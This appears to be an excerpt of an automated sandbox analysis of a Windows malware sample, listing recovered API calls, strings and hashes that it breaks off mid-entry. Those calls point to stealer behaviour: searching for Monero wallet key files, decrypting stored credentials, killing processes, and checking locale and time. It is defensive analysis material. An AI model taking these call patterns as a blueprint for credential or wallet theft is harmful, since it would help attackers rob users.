                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F315A8,00F30BAF), ref: 00F1DBEB
                                      • StrCmpCA.SHLWAPI(?,00F315AC), ref: 00F1DC33
                                      • StrCmpCA.SHLWAPI(?,00F315B0), ref: 00F1DC49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F1DECC
                                      • FindClose.KERNEL32(000000FF), ref: 00F1DEDE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: d787fbb483ba92234279fa36b525eb0b855bf94e539a4843530a7fcc9588c1a8
                                      • Instruction ID: 42fbea11ef90c784cd13f3af3cb8e375a3fffa48f834ea92ed79f5d817187394
                                      • Opcode Fuzzy Hash: d787fbb483ba92234279fa36b525eb0b855bf94e539a4843530a7fcc9588c1a8
                                      • Instruction Fuzzy Hash: C8913572A001189BCB14FBB4EDA69ED737DAFD4304F004968F91656185EF389B48DF92
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F29905
                                      • Process32First.KERNEL32(00F19FDE,00000128), ref: 00F29919
                                      • Process32Next.KERNEL32(00F19FDE,00000128), ref: 00F2992E
                                      • StrCmpCA.SHLWAPI(?,00F19FDE), ref: 00F29943
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F2995C
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F2997A
                                      • CloseHandle.KERNEL32(00000000), ref: 00F29987
                                      • CloseHandle.KERNEL32(00F19FDE), ref: 00F29993
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: ad634df17ace29d747b5e0b9f619ba3eefbdd31b99e03e75231e9d4a12851b2c
                                      • Instruction ID: a7b583c002245bf69c29ad8bca5136a75cb8622a65762885c499291296e60060
                                      • Opcode Fuzzy Hash: ad634df17ace29d747b5e0b9f619ba3eefbdd31b99e03e75231e9d4a12851b2c
                                      • Instruction Fuzzy Hash: 82110A75A00218ABDB24DFE4E848BDDB7B9BB48710F00459CF519AB284DB749AC4CF90
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,00F305B7), ref: 00F27D71
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00F27D89
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00F27D9D
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00F27DF2
                                      • LocalFree.KERNEL32(00000000), ref: 00F27EB2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID: /
                                      • API String ID: 3090951853-4001269591
                                      • Opcode ID: 79402a2bf9735224922c1e6dc316d4e097a3ab44b287ce87fc32cc4ac4b984e9
                                      • Instruction ID: e327f27b60dd68f28cc95fcd1015bdd6c87d9b72a46ab6e9deddfddb3fbecad7
                                      • Opcode Fuzzy Hash: 79402a2bf9735224922c1e6dc316d4e097a3ab44b287ce87fc32cc4ac4b984e9
                                      • Instruction Fuzzy Hash: 37414071941228ABDB24EB94EC99BEEB775FF44700F1041D9E00A66280DB746F84DFA1
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00F30D79), ref: 00F1E5A2
                                      • StrCmpCA.SHLWAPI(?,00F315F0), ref: 00F1E5F2
                                      • StrCmpCA.SHLWAPI(?,00F315F4), ref: 00F1E608
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F1ECDF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 433455689-1173974218
                                      • Opcode ID: 1dec55963a2860c3cb2f0cd62b8e76d8a651543379057357f514c452d7920d5a
                                      • Instruction ID: 5c17e9f9e471560e4de8d100e0aa9579d0facb154f10bb026b6d9fd33b55ca0f
                                      • Opcode Fuzzy Hash: 1dec55963a2860c3cb2f0cd62b8e76d8a651543379057357f514c452d7920d5a
                                      • Instruction Fuzzy Hash: 8B122971A101289BCB15FB60EDA6EED73797F94300F4045E9B50A66091EF389F88DF52
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: !J]h$*,{$7=(2$K\s;$[$W$uJf
                                      • API String ID: 0-1678003702
                                      • Opcode ID: e6dcdc40ddf8d978b6103fe5ca4a1648a62ae3371ddf5ab4ad8b43a4e6ed6fc2
                                      • Instruction ID: 67ea732c5b610089946bd5c4ad46ec7b1b3a575226069e211eee410cee848b6e
                                      • Opcode Fuzzy Hash: e6dcdc40ddf8d978b6103fe5ca4a1648a62ae3371ddf5ab4ad8b43a4e6ed6fc2
                                      • Instruction Fuzzy Hash: 34B24AF360C2049FE304AE2DEC8567ABBE9EF94720F1A453DE6C4C7744EA7598058687
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: J,;O$Ncm$_Ue$gZ^$kY{$o<\
                                      • API String ID: 0-2485871579
                                      • Opcode ID: ea5d7b61bb354fb4850f3800746bdecc3b219c341f6b99828a2346294735fd94
                                      • Instruction ID: a79f3f7b3cfffe0c21ae1b447ba14df45c0dc1f74dc2ac0fee3513f2fcd5847f
                                      • Opcode Fuzzy Hash: ea5d7b61bb354fb4850f3800746bdecc3b219c341f6b99828a2346294735fd94
                                      • Instruction Fuzzy Hash: 68B228F360C2049FE304AE2DEC8567ABBE5EF94720F1A493DE6C5C7744EA3198058697
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: &)/u$/Mlo$3_U$@tl$Coo$QL>
                                      • API String ID: 0-3412162994
                                      • Opcode ID: 8c6393fe94f454f34e04b61f687fc127749feda78ae12512c2297c60823ffb98
                                      • Instruction ID: 6a8bd7513d6909073c313e9f6e2725b115f3ec7fbeb99fc047f3e050eaf86711
                                      • Opcode Fuzzy Hash: 8c6393fe94f454f34e04b61f687fc127749feda78ae12512c2297c60823ffb98
                                      • Instruction Fuzzy Hash: 18A2E7F360C204AFE304AE29EC8567AFBE9EFD4720F16893DE6C4C3744E63558458696
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: C,_\$NUrv$[3k3$wA$|s
                                      • API String ID: 0-2675721242
                                      • Opcode ID: 9fae35271fdc83493eb89ecd55113ffe963530dc0972c6eec3128c3912197661
                                      • Instruction ID: 957c2f5fea5ba3c08f143e7dd63373b4a97246ff73d8f38e165207797f1c7bfb
                                      • Opcode Fuzzy Hash: 9fae35271fdc83493eb89ecd55113ffe963530dc0972c6eec3128c3912197661
                                      • Instruction Fuzzy Hash: A8A208F360C6049FE7046E29EC8577ABBE9EF94320F168A3DE6C4C3744EA3558058697
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: \u$\u${${$}$}
                                      • API String ID: 0-582841131
                                      • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                      • Instruction ID: 237720a5efea53669b2d2e43b2536b1485e3fea46bce2aa1818c31fd171f65b2
                                      • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                      • Instruction Fuzzy Hash: 5C415113D19BD5C5CB058B7444A02AEBFB26FD5220F6D82ABC4DD1F782C774414AD3A5
                                      APIs
                                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00F1C971
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00F1C97C
                                      • lstrcat.KERNEL32(?,00F30B47), ref: 00F1CA43
                                      • lstrcat.KERNEL32(?,00F30B4B), ref: 00F1CA57
                                      • lstrcat.KERNEL32(?,00F30B4E), ref: 00F1CA78
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlen
                                      • String ID:
                                      • API String ID: 189259977-0
                                      • Opcode ID: cc1a85309a55b87d92a16f6349d89f343c45bfb7a8e21e28b2d1781cd8253e2f
                                      • Instruction ID: 19d2507124cbd3fa177ba3af33c03c974693ba1d6ff4d587cf9e540a3ecb5737
                                      • Opcode Fuzzy Hash: cc1a85309a55b87d92a16f6349d89f343c45bfb7a8e21e28b2d1781cd8253e2f
                                      • Instruction Fuzzy Hash: 09414D75D0421E9BDB24CFE0DD99BEEF7B8AF48704F1041A8E509A6280D7745A84DFD1
                                      APIs
                                      • GetSystemTime.KERNEL32(?), ref: 00F26C0C
                                      • sscanf.NTDLL ref: 00F26C39
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00F26C52
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00F26C60
                                      • ExitProcess.KERNEL32 ref: 00F26C7A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID:
                                      • API String ID: 2533653975-0
                                      • Opcode ID: 8a74155dabb63f4bf6da50d15586faa3f0b8c1422c14e927c6ba613d34d964af
                                      • Instruction ID: e45623ee94510a5dd8a956e155d0dfe04c587a6e188aefcdfeab35f03dedecb9
                                      • Opcode Fuzzy Hash: 8a74155dabb63f4bf6da50d15586faa3f0b8c1422c14e927c6ba613d34d964af
                                      • Instruction Fuzzy Hash: 5221EB75D04219ABCF18EFE4E8459EEB7B9BF48300F04852AE416E7254EB349648CB65
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00F172AD
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F172B4
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00F172E1
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00F17304
                                      • LocalFree.KERNEL32(?), ref: 00F1730E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Similarity
                                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 2609814428-0
                                      • Opcode ID: c4e4cb25787cc22d61ecf73573aa21defa4239f466cc35c9c32d6e64ade07e18
                                      • Instruction ID: 454f9007e5901e45542404cf0f25b248ded87d724891fa33549e409ef5675838
                                      • Opcode Fuzzy Hash: c4e4cb25787cc22d61ecf73573aa21defa4239f466cc35c9c32d6e64ade07e18
                                      • Instruction Fuzzy Hash: FE015E75A44308BBEB24DFE4DC46F9E77B8AB44B00F104054FB15AF2C4CAB0AA409BA4
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F297AE
                                      • Process32First.KERNEL32(00F30ACE,00000128), ref: 00F297C2
                                      • Process32Next.KERNEL32(00F30ACE,00000128), ref: 00F297D7
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 00F297EC
                                      • CloseHandle.KERNEL32(00F30ACE), ref: 00F2980A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: 29c0522c521c5c87fcfbaab7dfbc18fe56c6b9589fcf76fa686cb2e50532942d
                                      • Instruction ID: 9bd2440f2ce84b5748e21b7851b1ce79ae0c20e0b0e4ac09c88b94433ddd48b8
                                      • Opcode Fuzzy Hash: 29c0522c521c5c87fcfbaab7dfbc18fe56c6b9589fcf76fa686cb2e50532942d
                                      • Instruction Fuzzy Hash: 05011E75E14219EBDB24DFE4E944BEDB7F9BB08700F144598E5099B280E7709B80DF90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: <7\h$huzx
                                      • API String ID: 0-2989614873
                                      • Opcode ID: fb088554cca104848bdf3783c4890dd00089d19523cd48941a37af4099f86a4c
                                      • Instruction ID: f09583392784a8361d75d56eccf231ab4b995d9187a74bce4d4e53819a7e98c7
                                      • Opcode Fuzzy Hash: fb088554cca104848bdf3783c4890dd00089d19523cd48941a37af4099f86a4c
                                      • Instruction Fuzzy Hash: C963537281EBD41ECB27CB3047B21517F66BA53A30B1D49CEC8C18B5B3C694AA16F356
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: $i?$=ekw$AK|f$n-v/
                                      • API String ID: 0-3545731386
                                      • Opcode ID: edaa1136bbcf1298667e713cd0a2d5ad012bff24feabcc489fe235bea4dde4bd
                                      • Instruction ID: 21a68c3b504658e8ba4c53c0dc2d23971200f6b0ced23d25b9f65c07100cc334
                                      • Opcode Fuzzy Hash: edaa1136bbcf1298667e713cd0a2d5ad012bff24feabcc489fe235bea4dde4bd
                                      • Instruction Fuzzy Hash: 35B238F360C6049FE304AE2DEC4567ABBE5EFD4720F1A893DE6C4C7744EA3598018696
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,00F151D4,40000001,00000000,00000000,?,00F151D4), ref: 00F29050
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      • API String ID: 80407269-0
                                      • Opcode ID: c0a99669ae3b805ae48de5bc0b301a0f7b931c5103f29682bbcabdb7f46194d3
                                      • Instruction ID: cb5791eef48b14d2fbc3e1be7e45a60c68b3b2f3515992c3451ff64fa8bac7cc
                                      • Opcode Fuzzy Hash: c0a99669ae3b805ae48de5bc0b301a0f7b931c5103f29682bbcabdb7f46194d3
                                      • Instruction Fuzzy Hash: C5110A75204219FFDF04CFA4E894FAA37A9AF89310F108458F91A8B244D7B5E941ABA0
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F14F3E,00000000,00000000), ref: 00F1A23F
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00F14F3E,00000000,?), ref: 00F1A251
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F14F3E,00000000,00000000), ref: 00F1A27A
                                      • LocalFree.KERNEL32(?,?,?,?,00F14F3E,00000000,?), ref: 00F1A28F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID:
                                      • API String ID: 4291131564-0
                                      • Opcode ID: 43d849a1b57c3a45c40daf75268982b5d197831aa98b7d39fe06c9da55026d46
                                      • Instruction ID: 90c284c5096f0fa358a6b4414bd260392b3a7fb62d650cd75fde7c3464dd5957
                                      • Opcode Fuzzy Hash: 43d849a1b57c3a45c40daf75268982b5d197831aa98b7d39fe06c9da55026d46
                                      • Instruction Fuzzy Hash: 4111A474641309AFEB15CFA4C895FAA77B5EB89B10F208458FD159F3C0C7B2A941CB90
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,01D8E080,00000000,?,00F30DF8,00000000,?,00000000,00000000), ref: 00F27BF3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F27BFA
                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,01D8E080,00000000,?,00F30DF8,00000000,?,00000000,00000000,?), ref: 00F27C0D
                                      • wsprintfA.USER32 ref: 00F27C47
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                      • String ID:
                                      • API String ID: 3317088062-0
                                      • Opcode ID: 9e033e838c2f4a8c2d1cf20bde86ac454428058f1d0fccffb61bd4db4365ebb6
                                      • Instruction ID: ca82bf8f392babf01dd44f6c90410da42a04c502e4d7efb9fb3fddac07e43c33
                                      • Opcode Fuzzy Hash: 9e033e838c2f4a8c2d1cf20bde86ac454428058f1d0fccffb61bd4db4365ebb6
                                      • Instruction Fuzzy Hash: F311E571D45229DBEB24DB94DC45FA9B7B8F700720F1003E5F519973C0C77459808B91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: BgO$Pxww$Q=g
                                      • API String ID: 0-435434314
                                      • Opcode ID: d03f841e5a83b1da0424e8c33115b3c12fcebf84adebe41f1c250144b3b40644
                                      • Instruction ID: 93c0f4e6a57c06f9082ecf3ec6af46336be8e4fe97253e25c0c6d3ca0e773f3c
                                      • Opcode Fuzzy Hash: d03f841e5a83b1da0424e8c33115b3c12fcebf84adebe41f1c250144b3b40644
                                      • Instruction Fuzzy Hash: D5B2E6B360C2149FE3046E2DEC8567AFBE9EF94720F1A493DEAC4C3744EA3558058697
                                      APIs
                                      • CoCreateInstance.COMBASE(00F2E120,00000000,00000001,00F2E110,00000000), ref: 00F239A8
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00F23A00
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID:
                                      • API String ID: 123533781-0
                                      • Opcode ID: 97820d8c063b591f27def186cfd69528c086cb5bd4775c7eecec7b6abea6d754
                                      • Instruction ID: fad5ee996651cdea3311fcaf2eebf42727e46691b3c84027833b6abc42e833ae
                                      • Opcode Fuzzy Hash: 97820d8c063b591f27def186cfd69528c086cb5bd4775c7eecec7b6abea6d754
                                      • Instruction Fuzzy Hash: 20411574A00A289FDB24DB58DC95B9BB7B5BB48702F4041D8E608EB2D0D7B5AEC5CF50
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F1A2D4
                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00F1A2F3
                                      • LocalFree.KERNEL32(?), ref: 00F1A323
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$AllocCryptDataFreeUnprotect
                                      • String ID:
                                      • API String ID: 2068576380-0
                                      • Opcode ID: d02b45e1ea6449ac393b9aec1c6b61458f6913421400efcddc227beb2eccc34c
                                      • Instruction ID: 947ae4fcbc64409030f899333645a843331126cb0b27b02b75505bec0342ba05
                                      • Opcode Fuzzy Hash: d02b45e1ea6449ac393b9aec1c6b61458f6913421400efcddc227beb2eccc34c
                                      • Instruction Fuzzy Hash: 3411E8B8A00209DFDB05DF94D884AAEB7B5FB88300F104569ED159B380D770AE50CBA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: }S{v$.Nw
                                      • API String ID: 0-670828264
                                      • Opcode ID: 8707c503c45eb7ac9e53500f840a25e8862997b21d8ca53bf65788f1c159c3af
                                      • Instruction ID: 845fbc33e36ec577fbee50fe756910efb403de9a1f82fc60376c24525a74d122
                                      • Opcode Fuzzy Hash: 8707c503c45eb7ac9e53500f840a25e8862997b21d8ca53bf65788f1c159c3af
                                      • Instruction Fuzzy Hash: 33B2F8F360C200AFE304AE2DEC8567ABBE9EF94720F16893DE6C5C7744E63558418697
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: ?$__ZN
                                      • API String ID: 0-1427190319
                                      • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                      • Instruction ID: 75af2624db7dee932e15201a7eab910553edbd6704547e0ed718211c9f07f8a4
                                      • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                      • Instruction Fuzzy Hash: 5A723572908B118BD714DF14C8907AEB7E2BFD5720F598A1DF4959B291D370EC41EB82
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: QjE!
                                      • API String ID: 0-3604107827
                                      • Opcode ID: bd34e9079324bf6b057b845f2b86d48420c9ae02d23e4c4af0f55d5251fe992f
                                      • Instruction ID: 407a9ca3f11b070875f2c8b42dbdcc6946b4d2d2c8f291f608277374e9cfd37a
                                      • Opcode Fuzzy Hash: bd34e9079324bf6b057b845f2b86d48420c9ae02d23e4c4af0f55d5251fe992f
                                      • Instruction Fuzzy Hash: 1CB2D4F3608204AFE304AE2DEC8577ABBE9EF94720F16493DE6C4C7744E63598058697
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: xn--
                                      • API String ID: 0-2826155999
                                      • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                      • Instruction ID: 1e0d319b0205551dbc1b0187160907d7d4b35c1a73e53496692b4aae1971ef89
                                      • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                      • Instruction Fuzzy Hash: BAA227B2D042688AEF18CF64C8603FDB7B1FF45310F1842AAD456BB281D7795E85EB51
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: f3CV
                                      • API String ID: 0-1081656333
                                      • Opcode ID: b789612d73187fcbe29e99f8831155bf44c5ce8cd25cb8f190bcc5ecd9195edc
                                      • Instruction ID: 1c81860793fd7e884dbd4e9d0fd3f8a58ed0298a8999384de980eaf725cd5af2
                                      • Opcode Fuzzy Hash: b789612d73187fcbe29e99f8831155bf44c5ce8cd25cb8f190bcc5ecd9195edc
                                      • Instruction Fuzzy Hash: A36229F3A082149FD300AE2DDC8567AFBE5EF94720F1A893DEAC4D7744E63598058786
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv
                                      • String ID:
